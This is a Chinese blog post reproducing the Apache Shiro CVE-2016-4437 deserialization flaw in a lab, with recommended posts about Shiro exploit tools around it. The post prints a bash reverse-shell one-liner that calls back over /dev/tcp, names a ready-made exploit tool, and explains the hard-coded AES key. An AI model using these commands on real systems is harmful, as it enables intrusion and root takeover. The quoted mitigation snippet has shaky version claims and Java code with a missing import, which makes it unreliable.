shiro 反序列化 _CVE-2016-4437

最新推荐文章于 2025-05-10 17:02:36 发布
最新推荐文章于 2025-05-10 17:02:36 发布
阅读量283 收藏
点赞数
分类专栏: java 文章标签: java 开发语言 hdfs nginx tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/web13293720476/article/details/126496084
版权

1.环境搭建

实验靶机:CentOS7(192.168.2.102)

攻击机:Kali-Linux(192.168.2.101)

在CentOS7开启docker容器:

浏览器登录192.168.2.102:8080

2.漏洞利用

影响版本:Apache Shiro <= 1.2.4

下载shiro反序列化工具:

Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com)

填入靶机地址:

对kali的9999端口进行监听:

点击执行:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JIYV23xh-1640671674023)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211225131031.png)]

可以看到shell反弹成功,获取root权限

利用的的反弹shell:

bash -i >& /dev/tcp/IP/PORT 0>&1

放到网站上进行加密java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

3.漏洞分析

漏洞原因:

Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞特征:

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

【漏洞复现】shiro 反序列化CVE-2016-4437
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 795
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。...
shiro反序列化[cve_2016_4437]
紫洋的博客
05-09 912
Apache Shiro 1.2.4 及以前版本中,加密的用户信息序列化后存储在名为 remember-me 的 Cookie 中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
最新发布
spinage的博客
05-10 409
攻击者可利用该漏洞通过伪造的 RememberMe Cookie 触发恶意代码执行
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用)
yy1715713348的博客
03-29 3353
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。客常用的开发软件都在这里了,给大家节省了很多时间。
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Shiro反序列化工具——ShiroAttack2
qq_44029310的博客
09-24 9920
shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题。作者为SummerSec。
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1740
0x01简介 这个漏洞属于java反序列化漏洞的一种,shirojava的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
Shiro550 反序列化漏洞(CVE-2016-4437
qq_68163788的博客
06-20 1281
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
shiro反序列化漏洞环境搭建
帅醉了的博客
05-09 2757
kali下shiro反序列化漏洞环境搭建 git clone https://github.com/apache/shiro.git git checkout shiro-root-1.2.4 #进入shiro cd samples/web 安装mvn工具 sudo apt-get install openjdk-8-jdk sudo mkdir -p /usr/local/apache-maven wget http://ftp.wayne.edu/apache/maven/maven-3/3.3.9/
shiro反序列化复现.zip
08-03
shiro反序列化复现工具包;shiro反序列化复现工具包;
shiro反序列化测试工具.zip
06-04
shiro反序列化测试工具包,两个使用任意一个即可
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具
反序列化工具
11-14
测试java反序列化工具很好用,下载插件一键监测就可以提升漏洞
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞。
Apache Shiro反序列化远程代码执行 复现 环境搭建
u010508029的博客
05-14 1062
docker pull medicean/vulapps:s_shiro_1 docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1 yum install python3-devel pip3 install pycryptodome shiro.py # pip install pycrypto import sys import base64 import uuid from random import Random impo..
cve-2016-4437
02-13
### CVE-2016-4437 漏洞详情 CVE-2016-4437 是 Apache Shiro 中的一个严重反序列化漏洞,该漏洞允许攻击者通过精心构造的 `rememberMe` cookie 执行远程代码。Apache Shiro 使用了 Java 的原生对象序列化机制来处理记住我功能中的用户凭证存储和恢复操作。 当客户端发送带有恶意构造的 `rememberMe` 值时,在服务器端执行如下流程:取出请求包中 `rememberMe` 的 cookie 值 => Base64 解码 => AES 解密 (用到密钥) => 反序列化[^4]。如果此时传入的数据被篡改,则可能导致任意代码被执行。 ### 影响范围 此漏洞影响所有使用默认配置启用了 "Remember Me" 功能的应用程序版本低于 1.2.4 和 1.3.x 版本低于 1.3.1 的 Apache Shiro 库实例。由于许多 Web 应用依赖于此类身份验证框架,因此潜在受影响面广泛,特别是那些未及时更新至安全补丁版的企业级应用系统[^2]。 ### 解决方案 为了防止利用这一缺陷实施攻击,建议采取以下措施之一: #### 方法一:升级库文件 最直接有效的方式是尽快将使用的 Shiro 库升级到最新稳定版本,如 1.2.4 或更高版本对于长期支持分支;如果是开发新项目则推荐采用最新的主要发行版。官方已经发布了解决该问题的安全更新,并且后续版本也加强了对此类风险点的关注与防护力度。 #### 方法二:禁用 RememberMe 功能 如果不必要的话可以选择关闭应用程序内的 “Remember Me” 登录选项。这可以通过调整配置参数实现,具体做法取决于所集成的具体方式以及平台特性。这样做虽然牺牲了一定用户体验便利性但是能彻底消除与此特性相关的安全隐患。 #### 方法三:自定义加密算法 另一种可行的办法是对原有的加解密逻辑进行改造,替换掉存在隐患的标准组件而选用更稳健可靠的第三方替代品或是自行设计一套基于现代密码学原理的新方案。例如引入像 BCrypt 这样的强哈希函数用于数据保护而非简单的对称秘钥变换过程。 ```java // 示例代码展示如何设置Shiro环境变量以禁用RememberMe功能 import org.apache.shiro.config.IniSecurityManagerFactory; import org.apache.shiro.mgt.SecurityManager; public class DisableRememberMe { public static void main(String[] args){ IniSecurityManagerFactory factory = new IniSecurityManagerFactory(); SecurityManager securityManager = factory.getInstance(); // 关闭RememberMe管理器 ((DefaultWebSecurityManager)securityManager).setRememberMeManager(null); } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值